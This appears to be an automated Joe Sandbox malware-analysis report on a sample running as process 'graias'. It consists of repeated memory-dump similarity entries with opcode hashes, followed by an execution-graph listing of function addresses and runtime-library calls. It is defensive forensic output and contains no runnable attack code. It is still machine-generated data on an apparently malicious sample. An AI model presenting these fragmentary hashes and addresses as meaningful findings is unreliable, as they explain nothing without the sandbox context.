                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc0629cf624bd71d0400a8976bf9be0462dfdae97d0edfc1287d938dc3ab74ec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6101F572A042095FE7649B5CE8817AABBE2EF94310F14453AE509CB351DB70DC41C790
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5f9f480b59b424612b44e80f2c7883c482d0dd7631111aefc65202ac4819c2c8
                                                                                                                                                                                                                                            • Instruction ID: 3d58689482d407e084e8613e3de8de1c73f9fec55defc856967f43dd3f2b35ce
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f9f480b59b424612b44e80f2c7883c482d0dd7631111aefc65202ac4819c2c8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2401A7316047008FEB64D7A9C951B5AB3E9EF85354F54C83EE849C72D8CB70E946C791
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 91c79aadb7c8c9e6674377b2872f2ceb5e1674ea0b22c5467de56e604cb0afec
• Instruction ID: de061590a2bf4674e115a2fd468b25deb8545ca9fba08f6fb8dcbd8a5fb742fa
• Opcode Fuzzy Hash: 91c79aadb7c8c9e6674377b2872f2ceb5e1674ea0b22c5467de56e604cb0afec
• Instruction Fuzzy Hash: AC0128316097008FEB65D7A9C951B2AB7E5EF85310F14C86EE445C72D9CB70EA46C790
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d1a392668d8066f18fbe81d728c0ddf990c8a2464eaeb29a5a6e6b87c61d6fe3
• Instruction ID: 1a798f0b645b13141faf4380f97de69c9c0dae019df483d09bd59df1f28732d5
• Opcode Fuzzy Hash: d1a392668d8066f18fbe81d728c0ddf990c8a2464eaeb29a5a6e6b87c61d6fe3
• Instruction Fuzzy Hash: 68012B329073559FC3155728E4496AAFFE4EF82710F0900EBE009CF192CB119944C7E1
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b5b911dbc6cb3ba858506002652e2b2152e4c7e023ea9b5d83018da3c49ad2ff
• Instruction ID: 76d1943ee7c6687be60a17f1df2fbb52bf4a32d0f5077e1241f7bb9a3b77b2c9
• Opcode Fuzzy Hash: b5b911dbc6cb3ba858506002652e2b2152e4c7e023ea9b5d83018da3c49ad2ff
• Instruction Fuzzy Hash: DA01F4313440004FC715A73D9468ABE3BE7EFC921471900AAE906CB392CE25CC03DB91
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3aed15d022c8f5b3267d6eb89925c54cff6fd0e51a7c73088ce37baef4199617
• Instruction ID: e57c5797833c97b95e520d4c349bccb69ce6ea5c08f7e706d16163b6a95b7559
• Opcode Fuzzy Hash: 3aed15d022c8f5b3267d6eb89925c54cff6fd0e51a7c73088ce37baef4199617
• Instruction Fuzzy Hash: E1012631608345AFEB35CFA9E40076ABBF49F41214F2884AEDC85CB6E2D771E940C791
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8c014fe3b961294b47ac65a0ae258e99b2e22be8104f42715e48a84f4e68f808
• Instruction ID: 4bce90f045f2832d29e546cb6bac19dd226fe62d5440779b2769dcfc76a12e4e
• Opcode Fuzzy Hash: 8c014fe3b961294b47ac65a0ae258e99b2e22be8104f42715e48a84f4e68f808
• Instruction Fuzzy Hash: E3F0C231604704ABFF78CF5AE440B6AB7E5EF44314F20492DD84A8B6E0DB71E981CB90
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 68cfcf72a62d60300b833a5bba9f2a90dc77fc611c77d6930276b28271ceb129
• Instruction ID: f98e668a75c201b7169a284b18b3a381bdc3525534a409fa1b70a3b925cae182
• Opcode Fuzzy Hash: 68cfcf72a62d60300b833a5bba9f2a90dc77fc611c77d6930276b28271ceb129
• Instruction Fuzzy Hash: 59F0F672B041004FE3B4AB39CC90BBA77AAEBC0651F055469D162CB292EE70DC01C752
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f580288d091c99f0d276cd7a76684685f7c97e8415a2872463290b0e6c59a8b0
• Instruction ID: 41220430cb11ee9292088477a18f85af55a571afb7b51c8ff0f76c1d752ed8c0
• Opcode Fuzzy Hash: f580288d091c99f0d276cd7a76684685f7c97e8415a2872463290b0e6c59a8b0
• Instruction Fuzzy Hash: 9701F639B00500CF9B59CF29D584D98B7F2FF88311B9540A9D505DB6A1DB31EC85CF90
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe05a3d4380715ee44b1b801145d782a386a7d330c9ba1ab4d2a28e70ca1016c
• Instruction ID: 5585931a978895cd7b047b6160f141a04b3880639dfdf2c67710e482b86923fe
• Opcode Fuzzy Hash: fe05a3d4380715ee44b1b801145d782a386a7d330c9ba1ab4d2a28e70ca1016c
• Instruction Fuzzy Hash: AAF0B4317141048FE6A4AA39C85476A73DAEBC0261F05546DD226CF391DE70DD41D392
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 15f3c8b91ae7e37b7d46fd25b18e921bf3df3f38a769c5571e669c9a1cbf3584
• Instruction ID: ab51e24f8861b51e2482a5233f9a333dd04a574f489acd55ca0ccfe1514eb9e7
• Opcode Fuzzy Hash: 15f3c8b91ae7e37b7d46fd25b18e921bf3df3f38a769c5571e669c9a1cbf3584
• Instruction Fuzzy Hash: 0FF0A4306047098FE7559B7AD864BA577A4AF41710F0146AEE495CB2F1CB70E841D7A0
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ae57eecd0acaccdfbbd2ef85f13ac3817e5d64ecf6bd074887c104a2e8e65ad1
• Instruction ID: c648174abe5e2d7d239ae6cb361393c7ad23221b048861d8cbd93de49e610a08
• Opcode Fuzzy Hash: ae57eecd0acaccdfbbd2ef85f13ac3817e5d64ecf6bd074887c104a2e8e65ad1
• Instruction Fuzzy Hash: 26F09779B485608FC7022378446807E7FE2EBCA25230404C9C382C7281DF18A523C3C1
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5b560482f7df1ae8c53d2aa99bb3ee0a8fe99c6eb0ef676f992c6cc145b6cf3e
• Instruction ID: 93fdba3f3c08f9d670eb9c45f106b08922d8e4d42374752565feeb742afd4332
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b560482f7df1ae8c53d2aa99bb3ee0a8fe99c6eb0ef676f992c6cc145b6cf3e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04011935A00219CFDB04DF68D884B9CB7B1FF48310F1086AAE159AB3A1CB34AC41CFA0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 54e5b5619d571603c200bd74151ac838855b57b9a9500bcb452a07e787fb488b
                                                                                                                                                                                                                                            • Instruction ID: 3894f228003730a4e00ff08f99b793eeddb829c123ad78c49bc38c6069df2a33
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54e5b5619d571603c200bd74151ac838855b57b9a9500bcb452a07e787fb488b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CE0923DB043559BDB19276E5420AEF3AEB8FC55A1B89006BDA05CB281FD648851C2E1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e37e7c607fd85ef4cc2604fcfe3d2aa7da3597fbd0122f8252240cc146dfe4d7
                                                                                                                                                                                                                                            • Instruction ID: 282590b23339b5d6d549eee0ed159cc14aba0cb3b536a3128a329bc6fdff6654
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e37e7c607fd85ef4cc2604fcfe3d2aa7da3597fbd0122f8252240cc146dfe4d7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4E04F3DB102159B9A59236E5414A6F25DB8BC55A13C8012A9705C73C4FD64CC02C2E2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 739b83ee3e8789f9f6d87577216a65a5bc56a12be4202b489ed717ea8ab57cf7
                                                                                                                                                                                                                                            • Instruction ID: 15491a100b8aa86e7b58a1ee596b5d5a1bcccf02df1d3d5310b6f167f5686f29
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 739b83ee3e8789f9f6d87577216a65a5bc56a12be4202b489ed717ea8ab57cf7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DF03471604A018FC725DF08D180966F7E6FB8832571ACA5EC8AA87B41D334F856CB80
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e22baa22eac3f060f4970088fb12622d04ad25f53f16dc61af2303f2f21043d6
                                                                                                                                                                                                                                            • Instruction ID: 638936e9772f394e76de9afc3eb4a9969faeae1ae004072aec47854a0cbfc32f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e22baa22eac3f060f4970088fb12622d04ad25f53f16dc61af2303f2f21043d6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEF0653691021CAB9F50DF988C055ED3BA5EF0A339F144522FD65D21C1D375E660DBA2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: fa341d190e3d4afd65a8e85012850a67647cac1bfbb7b34a16491fd675145b3a
                                                                                                                                                                                                                                            • Instruction ID: d9a49033cbe15f17e59f0b135efcaf608641834283044aff84d692bcbbc9f6b7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa341d190e3d4afd65a8e85012850a67647cac1bfbb7b34a16491fd675145b3a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61E026313400105B8288661E98C497E77CADBCD62031144BAF20DC3352CD20CC050390
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 38ad90c3a3f4a3659b9042024c42ec6bbbc31d5537f7ec0f7042b3d37fe10710
                                                                                                                                                                                                                                            • Instruction ID: 343fdac6f59195aea9e8db3f8f4c55d957b77a69d27966d5ae91653950ff4778
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38ad90c3a3f4a3659b9042024c42ec6bbbc31d5537f7ec0f7042b3d37fe10710
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EE0DF727040501FC794662DA894ABE6BDADBCDA20B1600BEE20DC7363D9218C068311
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 44e63139b111aaeb520228cffc7d208d0c1adac22317e01861c557afef01833f
                                                                                                                                                                                                                                            • Instruction ID: f5018cb16fe064ddc183011083415bf7f194abae72dd4e72207dca5380b68737
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44e63139b111aaeb520228cffc7d208d0c1adac22317e01861c557afef01833f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81D0A7A270827007C751125C79047BE6ED68BCA621B0804FFED02CB387DA500D054395
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 55d705bce8d63b15c8167ad53cd754de3dfdd7798161effd5dfc8dbf0e630663
                                                                                                                                                                                                                                            • Instruction ID: c33e2a5fd868d23e6ee6babd7a188c3e7dd0e0d5bc5b7f49e604d07b91a38754
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55d705bce8d63b15c8167ad53cd754de3dfdd7798161effd5dfc8dbf0e630663
• Instruction Fuzzy Hash: 60E012705493849FC715CB24E944A517F65AF46205B1884E9E8084F163EB22E845DA51
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 598d7e092770c6c92b303347d5fc576bc9362dc4819ebd7c3eef86eebc1c8e6b
• Instruction ID: 4e0febd097ab8538d8e030349ddb58dd1af0f6e475104fff4a56a22f9e7a57bb
• Opcode Fuzzy Hash: 598d7e092770c6c92b303347d5fc576bc9362dc4819ebd7c3eef86eebc1c8e6b
• Instruction Fuzzy Hash: 5DD09239A40109CFDB00DB98E589AECB7F1FB88319F2441A6D60997761C331A955CB90
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 18a8a56dd9f46154285a57455508cce21adb25081020c9ab6f585991bbc0f9ba
• Instruction ID: 7c7afbfa6f801c075395e236d0df242f68b3228b6c5cd5a88ac442a79944b0c6
• Opcode Fuzzy Hash: 18a8a56dd9f46154285a57455508cce21adb25081020c9ab6f585991bbc0f9ba
• Instruction Fuzzy Hash: 66D01230200204CFC708DF28EA85C217BA8FF49708718C5A8F0088F232DB32EC42CE91
Strings
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID: @$@$B$B$Hhq
• API String ID: 0-3150279512
• Opcode ID: 59dd31f8c6ea86550d56207ade62e519e004459bb7e156bd459bede3498ae00f
• Instruction ID: e4fdbfca345e52df2e0969bb8ae74ab4b34eba5ca4a10537a86181975528c1c6
• Opcode Fuzzy Hash: 59dd31f8c6ea86550d56207ade62e519e004459bb7e156bd459bede3498ae00f
• Instruction Fuzzy Hash: 3E51D435B046058FD764DF79D88066ABBF6FF8922071485AAE519C73A1DB32DC42CB90
Strings
Memory Dump Source
• Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
Similarity
• API ID:
• String ID: @$@$B$B
• API String ID: 0-685577651
• Opcode ID: be9d53089e14dfa03aeebf25fc87314955dd579f6cf8283a82d86f5b49e9ca6c
• Instruction ID: 75bff0565d159f21c6a9252dcc61aeaf8266e7a3414960ed0462cf2f832efb81
• Opcode Fuzzy Hash: be9d53089e14dfa03aeebf25fc87314955dd579f6cf8283a82d86f5b49e9ca6c
• Instruction Fuzzy Hash: A8219F71F046168FEB64CF6DD884A6EBBF5EF8821471441ABE216D72A1D732DD40CB81

Execution Graph

Execution Coverage: 2.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 1659
Total number of Limit Nodes: 5
                                                                                                                                                                                                                                            execution_graph 6732 10007a80 6733 10007a8d 6732->6733 6734 1000637b _abort 20 API calls 6733->6734 6735 10007aa7 6734->6735 6736 1000571e _free 20 API calls 6735->6736 6737 10007ab3 6736->6737 6738 1000637b _abort 20 API calls 6737->6738 6741 10007ad9 6737->6741 6740 10007acd 6738->6740 6739 10005eb7 11 API calls 6739->6741 6742 1000571e _free 20 API calls 6740->6742 6741->6739 6743 10007ae5 6741->6743 6742->6741 7172 10007103 GetCommandLineA GetCommandLineW 7173 10005303 7176 100050a5 7173->7176 7185 1000502f 7176->7185 7179 1000502f 5 API calls 7180 100050c3 7179->7180 7181 10005000 20 API calls 7180->7181 7182 100050ce 7181->7182 7183 10005000 20 API calls 7182->7183 7184 100050d9 7183->7184 7186 10005048 7185->7186 7187 10002ada _ValidateLocalCookies 5 API calls 7186->7187 7188 10005069 7187->7188 7188->7179 6744 10009c88 6745 10009c95 6744->6745 6746 10009ca9 6745->6746 6749 10009ccd 6745->6749 6756 10009cc0 6745->6756 6747 10009cb0 6746->6747 6748 10009cc4 6746->6748 6752 10006368 _free 20 API calls 6747->6752 6751 10006332 __dosmaperr 20 API calls 6748->6751 6755 10006368 _free 20 API calls 6749->6755 6749->6756 6750 10002ada _ValidateLocalCookies 5 API calls 6753 10009d15 6750->6753 6751->6756 6754 10009cb5 6752->6754 6757 10006355 __dosmaperr 20 API calls 6754->6757 6758 10009cf2 6755->6758 6756->6750 6757->6756 6759 10006355 __dosmaperr 20 API calls 6758->6759 6759->6756 6760 10008a89 6763 10006d60 6760->6763 6764 10006d69 6763->6764 6765 10006d72 6763->6765 6767 10006c5f 6764->6767 6768 10005af6 _abort 38 API calls 6767->6768 6769 10006c6c 6768->6769 6770 10006d7e 38 API calls 6769->6770 6771 10006c74 6770->6771 6787 100069f3 6771->6787 6774 10006c8b 6774->6765 6779 1000571e _free 20 API calls 6779->6774 6780 10006cc9 
6782 10006368 _free 20 API calls 6780->6782 6781 10006ce6 6783 10006d12 6781->6783 6784 1000571e _free 20 API calls 6781->6784 6786 10006cce 6782->6786 6783->6786 6811 100068c9 6783->6811 6784->6783 6786->6779 6788 100054a7 38 API calls 6787->6788 6789 10006a05 6788->6789 6790 10006a14 GetOEMCP 6789->6790 6791 10006a26 6789->6791 6793 10006a3d 6790->6793 6792 10006a2b GetACP 6791->6792 6791->6793 6792->6793 6793->6774 6794 100056d0 6793->6794 6795 1000570e 6794->6795 6799 100056de _abort 6794->6799 6797 10006368 _free 20 API calls 6795->6797 6796 100056f9 RtlAllocateHeap 6798 1000570c 6796->6798 6796->6799 6797->6798 6798->6786 6801 10006e20 6798->6801 6799->6795 6799->6796 6800 1000474f _abort 7 API calls 6799->6800 6800->6799 6802 100069f3 40 API calls 6801->6802 6803 10006e3f 6802->6803 6806 10006e90 IsValidCodePage 6803->6806 6808 10006e46 6803->6808 6810 10006eb5 ___scrt_fastfail 6803->6810 6804 10002ada _ValidateLocalCookies 5 API calls 6805 10006cc1 6804->6805 6805->6780 6805->6781 6807 10006ea2 GetCPInfo 6806->6807 6806->6808 6807->6808 6807->6810 6808->6804 6814 10006acb GetCPInfo 6810->6814 6887 10006886 6811->6887 6813 100068ed 6813->6786 6815 10006b05 6814->6815 6823 10006baf 6814->6823 6824 100086e4 6815->6824 6818 10002ada _ValidateLocalCookies 5 API calls 6820 10006c5b 6818->6820 6820->6808 6822 10008a3e 43 API calls 6822->6823 6823->6818 6825 100054a7 38 API calls 6824->6825 6826 10008704 MultiByteToWideChar 6825->6826 6828 10008742 6826->6828 6829 100087da 6826->6829 6831 100056d0 21 API calls 6828->6831 6834 10008763 ___scrt_fastfail 6828->6834 6830 10002ada _ValidateLocalCookies 5 API calls 6829->6830 6832 10006b66 6830->6832 6831->6834 6838 10008a3e 6832->6838 6833 100087d4 6843 10008801 6833->6843 6834->6833 6836 100087a8 MultiByteToWideChar 6834->6836 6836->6833 6837 100087c4 GetStringTypeW 6836->6837 6837->6833 6839 100054a7 38 API calls 6838->6839 6840 10008a51 6839->6840 6847 10008821 6840->6847 6844 1000880d 6843->6844 6845 1000881e 
6843->6845 6844->6845 6846 1000571e _free 20 API calls 6844->6846 6845->6829 6846->6845 6848 1000883c 6847->6848 6849 10008862 MultiByteToWideChar 6848->6849 6850 10008a16 6849->6850 6851 1000888c 6849->6851 6852 10002ada _ValidateLocalCookies 5 API calls 6850->6852 6856 100056d0 21 API calls 6851->6856 6857 100088ad 6851->6857 6853 10006b87 6852->6853 6853->6822 6854 100088f6 MultiByteToWideChar 6855 10008962 6854->6855 6858 1000890f 6854->6858 6860 10008801 __freea 20 API calls 6855->6860 6856->6857 6857->6854 6857->6855 6874 10005f19 6858->6874 6860->6850 6862 10008971 6864 100056d0 21 API calls 6862->6864 6868 10008992 6862->6868 6863 10008939 6863->6855 6866 10005f19 11 API calls 6863->6866 6864->6868 6865 10008a07 6867 10008801 __freea 20 API calls 6865->6867 6866->6855 6867->6855 6868->6865 6869 10005f19 11 API calls 6868->6869 6870 100089e6 6869->6870 6870->6865 6871 100089f5 WideCharToMultiByte 6870->6871 6871->6865 6872 10008a35 6871->6872 6873 10008801 __freea 20 API calls 6872->6873 6873->6855 6875 10005c45 _abort 5 API calls 6874->6875 6876 10005f40 6875->6876 6879 10005f49 6876->6879 6882 10005fa1 6876->6882 6880 10002ada _ValidateLocalCookies 5 API calls 6879->6880 6881 10005f9b 6880->6881 6881->6855 6881->6862 6881->6863 6883 10005c45 _abort 5 API calls 6882->6883 6884 10005fc8 6883->6884 6885 10002ada _ValidateLocalCookies 5 API calls 6884->6885 6886 10005f89 LCMapStringW 6885->6886 6886->6879 6888 10006892 ___scrt_is_nonwritable_in_current_image 6887->6888 6895 10005671 RtlEnterCriticalSection 6888->6895 6890 1000689c 6896 100068f1 6890->6896 6894 100068b5 _abort 6894->6813 6895->6890 6908 10007011 6896->6908 6898 1000693f 6899 10007011 26 API calls 6898->6899 6900 1000695b 6899->6900 6901 10007011 26 API calls 6900->6901 6902 10006979 6901->6902 6903 100068a9 6902->6903 6904 1000571e _free 20 API calls 6902->6904 6905 100068bd 6903->6905 6904->6903 6922 100056b9 RtlLeaveCriticalSection 6905->6922 6907 100068c7 6907->6894 6909 10007022 6908->6909 
6918 1000701e 6908->6918 6910 10007029 6909->6910 6914 1000703c ___scrt_fastfail 6909->6914 6911 10006368 _free 20 API calls 6910->6911 6912 1000702e 6911->6912 6913 100062ac ___std_exception_copy 26 API calls 6912->6913 6913->6918 6915 10007073 6914->6915 6916 1000706a 6914->6916 6914->6918 6915->6918 6920 10006368 _free 20 API calls 6915->6920 6917 10006368 _free 20 API calls 6916->6917 6919 1000706f 6917->6919 6918->6898 6921 100062ac ___std_exception_copy 26 API calls 6919->6921 6920->6919 6921->6918 6922->6907 6923 1000508a 6924 100050a2 6923->6924 6925 1000509c 6923->6925 6926 10005000 20 API calls 6925->6926 6926->6924 6022 1000220c 6023 10002215 6022->6023 6024 1000221a dllmain_dispatch 6022->6024 6026 100022b1 6023->6026 6027 100022c7 6026->6027 6029 100022d0 6027->6029 6030 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6027->6030 6029->6024 6030->6029 6927 10003c90 RtlUnwind 6031 10002418 6032 10002420 ___scrt_release_startup_lock 6031->6032 6035 100047f5 6032->6035 6034 10002448 6036 10004804 6035->6036 6037 10004808 6035->6037 6036->6034 6040 10004815 6037->6040 6041 10005b7a _free 20 API calls 6040->6041 6044 1000482c 6041->6044 6042 10002ada _ValidateLocalCookies 5 API calls 6043 10004811 6042->6043 6043->6034 6044->6042 6928 10004a9a 6931 10005411 6928->6931 6932 1000541d _abort 6931->6932 6933 10005af6 _abort 38 API calls 6932->6933 6936 10005422 6933->6936 6934 100055a8 _abort 38 API calls 6935 1000544c 6934->6935 6936->6934 7580 1000679a 7581 100067a4 7580->7581 7582 100067b4 7581->7582 7583 1000571e _free 20 API calls 7581->7583 7584 1000571e _free 20 API calls 7582->7584 7583->7581 7585 100067bb 7584->7585 6045 1000281c 6048 10002882 6045->6048 6051 10003550 6048->6051 6050 1000282a 6052 1000355d 6051->6052 6056 1000358a 6051->6056 6053 100047e5 ___std_exception_copy 21 